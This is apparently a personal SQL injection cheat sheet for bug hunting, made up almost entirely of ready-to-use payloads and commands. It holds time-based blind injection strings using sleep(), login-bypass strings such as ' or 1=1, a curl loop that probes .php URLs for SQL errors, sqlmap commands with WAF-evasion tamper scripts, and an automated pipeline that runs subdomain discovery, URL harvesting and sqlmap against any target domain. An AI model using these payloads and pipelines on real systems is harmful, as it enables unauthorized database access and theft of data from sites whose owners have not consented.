
'(select*from(select(sleep(40)))a)+

0'XOR(if(now()=sysdate(),sleep(1),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z

0'XOR(if(now()=sysdate(),sleep(35),0))XOR'Z

cat urls.txt | grep ".php" | sed 's/\.php.*/.php\//' | sort -u | sed s/$/%27%22%60/ | while read url do ; do curl --silent "$url" | grep -qs "You have an error in your SQL syntax" && echo -e "$url \e[1;32mSQLI by Ibrahim\e[0m" || echo -e "$url \e[1;31mNot Vulnerable to SQLI Injection\e[0m" ;done
by ibrahim ^^^^

sqlmap -r url --risk 3 --level 3 --dbs --tamper=space2comment,space2morehash

(select(0)from(select(sleep(6)))v)/%27%2B(select(0)from(select(sleep(6)))v)%2B%27%22%2B(select(0)from(select(sleep(6)))v)%2B%22/&


&order=asc,(SELECT%20(CASE%20WHEN%20(1=1)%20THEN%20SLEEP(10)%20ELSE%202%20END)) //time based

‘+(select*from(select(sleep(20)))a)+’ //this is for time based sql injection 

' or 1=1 limit 1 -- -+
 
 ' or ''=' 

0 ' XOR( if(now()=sysdate(),sleep(15),0))XOR'Z  

' or sleep(17)#

 ///
 
 
 (change target with your domain eg: sample.com)
 
 subfinder -d target | tee -a domains
 cat domains | httpx | tee -a alive.txt 
 cat alive.txt | waybackurls | tee -a urls 
 gf sqli urls >> sqli
 python3 sqlmap.py -m sqli --dbs --batch
